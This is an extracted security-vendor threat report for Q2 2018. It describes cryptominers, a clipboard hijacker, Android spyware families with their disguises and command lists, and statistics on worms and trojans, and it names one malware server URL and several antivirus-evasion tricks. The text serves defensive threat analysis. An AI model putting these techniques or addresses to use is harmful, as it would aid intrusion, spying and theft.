Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 18 of 73
The malicious code in the registry
Global Threat Report Q2 2018 Edition
Page 19 of 73
This emergency clearly demonstrates how dangerous cryptominer activity can be Just imagine it the entire compute capacity of the enterprises computers was engaged in mining cryptocurrency depriving employees of the ability to perform their jobs Comodo analysts took over the situation and cleaned the infection from all involved computers but of course the financial losses of the company were irreversible
Invulnerability to an antivirus and persistence in the system are the most important attributes for a cryptominer because the more it runs within the infected system the more it profits the attackers That is why cybercriminals give special attention to the cryptominers ability to elude antivirus software
Below is another cunning technique that turns an infected machine into a slave of the attacker
32 WinstarNssmMiner a system killer Like other cryptominers The WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals But it has a special feature ndash it can root into a system so deeply that it becomes unremovable Attempting to kill it will kill the target system totally
The secret of WinstarNssmMinerrsquos persistence lies in its method of infecting a victimrsquos computer It consists of two processes injected into two system svchostexe processes The first performs the main task ndash mining cryptocurrency The other runs in the background looking for antivirus products and disables them
The malicious code disguised as svhostexe
Especially impressive is that both infected svchostexe processed possess the system attribute ldquoCriticalProcess meaning that terminating any of them will crash the system leaving the user with a blue screen
WinstarNssmMiner spreading around the world
Global Threat Report Q2 2018 Edition
Page 20 of 73
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victimsrsquo system but their cryptomining competitors
33 CoinMiner kills rivals CoinMiner stands out against other cryptominers with a kill list feature that checks the infected machine for the presence of other cryptomalware If an ldquoalienrdquo cryptominer is detected the feature will terminate its processes
CoinMiner kills its rivals as follows
The code below downloads CoinMiner for Windows architecture (x86 or x64) and then checks if a miner is already running by testing the presence of an ldquoAMDDriver64rdquo process
Global Threat Report Q2 2018 Edition
Page 21 of 73
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists named $malwares and $malwares2 with the names of the processes that it is instructed to kill The lists include other types of cryptominers
In this way CoinMiner undividedly occupies the victims computer to use its resources for mining cryptocurrency
Global Threat Report Q2 2018 Edition
Page 22 of 73
Some cryptominers earned the spotlight of the mass-media and cybersecurity researchers easing user detection In Q2 these cryptominers learned to hide CoinHive is the brightest example of them
34 CoinHive changes its skin CoinHive is a popular JavaScript cryptominer If you put its string of code into your website page every visitor to the site will mine coins for you
As you can see the CoinHive script is easily detected
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports users have started checking websites codes for cryptominers But in the second quarter perpetrators found a way to overcome this obstacle Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners
Global Threat Report Q2 2018 Edition
Page 23 of 73
As a result the malicious code on a webpage looks like this
The obfuscated malicious code on a webpage
If we decode the string we encounter an iframe
The iframe loads the URL shortener
The iframe loads the URL shortener Notice the width and height of the iframe are set to 1 to make the iframe as invisible as possible
Now letrsquos see at the URL httpscnhvco
And there we can find the familiar link to CoinHive
The link to CoinHive
Global Threat Report Q2 2018 Edition
Page 24 of 73
What is the impact of this trick In a simple scenario a user visits a CoinHive-infected website Noticing notices that her computerrsquos CPU is overloaded she decides to check the webpage code but doesnrsquot find any signs of a cryptominer So she concludes that something went wrong with her PC while CoinHive coopts her computer to mine cryptocoins
The next malware in the raw prefers not mining cryptocurrency but steal it on-the-fly
35 Cryptocurrency clipboard hijacker intercepts transfers It would be more accurate to call this program cryptothief rather than cryptominer Because it does not devour an infected machinersquos resources but instead actually steals cryptocurrency redirecting it to the perpetrator
Cryptocurrency transfers require a wallet address The address is a long string combined with different characters and numbers so it is almost impossible to remember it or fill in manually That is why users usually copy-paste a wallet address to make a transaction Cybercriminals regard this copy-paste process a breach they can use to their advantage
Cryptocurrency clipboard hijacker checks the clipboard for a wallet address copy Upon finding one it changes it for the address of the wallet under the attackers control So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminalsrsquo hands
New Cryptocurrency Clipboard Hijacker sample can monitor 2343286 addresses
This malware is distributed in a bundle with the All-Radio 427 Portable software All-Radio 427 is a legitimate video and audio player created by Russian developers But cybercriminals copied the program and added the malicious code The malicious version of All-Radio 427 was used for spreading different types of malware clipboard cryptocurrency hijackers among them
Here is an example of a clipboard hijacker attack
A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm
Global Threat Report Q2 2018 Edition
Page 25 of 73
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity they seem to come back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors
Global Threat Report Q2 2018 Edition
Page 26 of 73
4 Android Devices Under Siege
41 Spying Stealing Mining Android devices are rapidly becoming high-value targets for cybercriminals and malware authors It is not surprising because today almost any smartphone is a treasure trove of information for perpetrators People increasingly use smartphones for financial operations but those are not the only jackpot for attackers Today every smartphone contains a plethora of confidential information about its owner
If the victim is a CEO politician or other VIP the content of the mobile device can be sold at the highest prices Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims Of course not only cybercriminals hunt for smartphone content Intelligence agencies and business competitors want to know everything about their targets Add jealous spouses tracking every move of their partners and parents wanting to control their children and you will easily understand why Android-oriented malware is a growing business
Today spying is the number one purpose of the Android malware In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them You can see the whole family of these digital spooks on the graph
The digital spooks
Global Threat Report Q2 2018 Edition
Page 27 of 73
Like real-world spies digital agents impersonate legitimate entities pretending to innocent applications or hiding malicious code inside legitimate software Like real spies they seek to remain invisible and constantly change disguises to avoid detection and hone their tradecraft from version to version
411 KevDroid The first is named KevDroid Itrsquos distributed in three versions
Version-1 Naver Defender
Version-2 Netease Defender
Version-3
PU
Disguises of KevDroid
The first version disguised as the Naver Defender application covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection This sample has multifunctional abilities for spying It steals account details contacts id name phone numbers and email address of the owner It grabs SMS messages and associated info It attempts to read call logs (number name type duration) emails (email type) and photos of the contacts After extracting all the data the malware encrypts it with ldquoAESrdquo algorithm and send to the attackersrsquo server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victimrsquos every phone call then encrypts and uploads it to the cybercriminalsrsquo server In addition it collects information about currently running services installed apps and the launcher name
The second version Netease Defender has additional spying abilities It takes control over the device camera and covertly records the victimrsquos activity Then it sends the video to the attackersrsquo server
Version-3 of KevDroid makes photos records call and creates a list of files on the device Also it extracts the web history account and contact details and the device information
People assume they are safe if they download apps exclusively from the official Google Play store This wrong assumption can be costly the first version of Desert Scorpion spyware was spread via official Google Play Services The spyware was camouflaged as a chat called Dardesh Instant App But when a user downloaded and ran it the app covertly connected to
Global Threat Report Q2 2018 Edition
Page 28 of 73
cybercriminalsrsquo Command and Control server and downloaded the spyware on the device From that moment the spyware constantly kept track of all events on the infected device Another means of the malware dissemination was social networks
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls audios and videos uninstalls other apps sends and receives messages and tracks the location of the smartphone It is included in some spyware tools like FinSpy and Pegasus Beyond the capabilities of the first version it collects information about installed applications extracts the metadata and makes changes on the victim device
Global Threat Report Q2 2018 Edition
Page 29 of 73
412 Zoo Park The next member of the spy family Zoo Park has 4 different versions
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app It extracts Accounts and Contacts details encodes them with Base64 and sends to the attackers server The second version has additional abilities extracting SMS details device information (including IMEI Network Operator Name SDK version OS version etc) Call Log details and External Storage content
The third version is included in spyware named ldquoSpymaster Prordquo and can
Enable and disable the GPS services
Record audio and send it to Command amp Control server
Upload image files
Collect information about the application installed
Collect browserrsquos data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy DroFirewall etc
Global Threat Report Q2 2018 Edition
Page 30 of 73
In addition to the abilities of previous versions it includes some additional tricks
Extracts photos audios and videos
Records screen
Executes shell commands
Records calls
413 MikeSpy Some spyware examples specifically hunt for messengerrsquos data Like the next digital spook MikeSpy
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application But instead of girlfriend it has a bundle of malicious abilities
Takes control over Bluetooth Adapter
Extracts data about accounts contacts details installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminalsrsquo server via FTP
414 Xloader The next spyware Xloader combines spying with purposeful hunting for banking applications on the device It has trust-inspired cover icons imitating Facebook and Google Chrome
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
Global Threat Report Q2 2018 Edition
Page 31 of 73
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
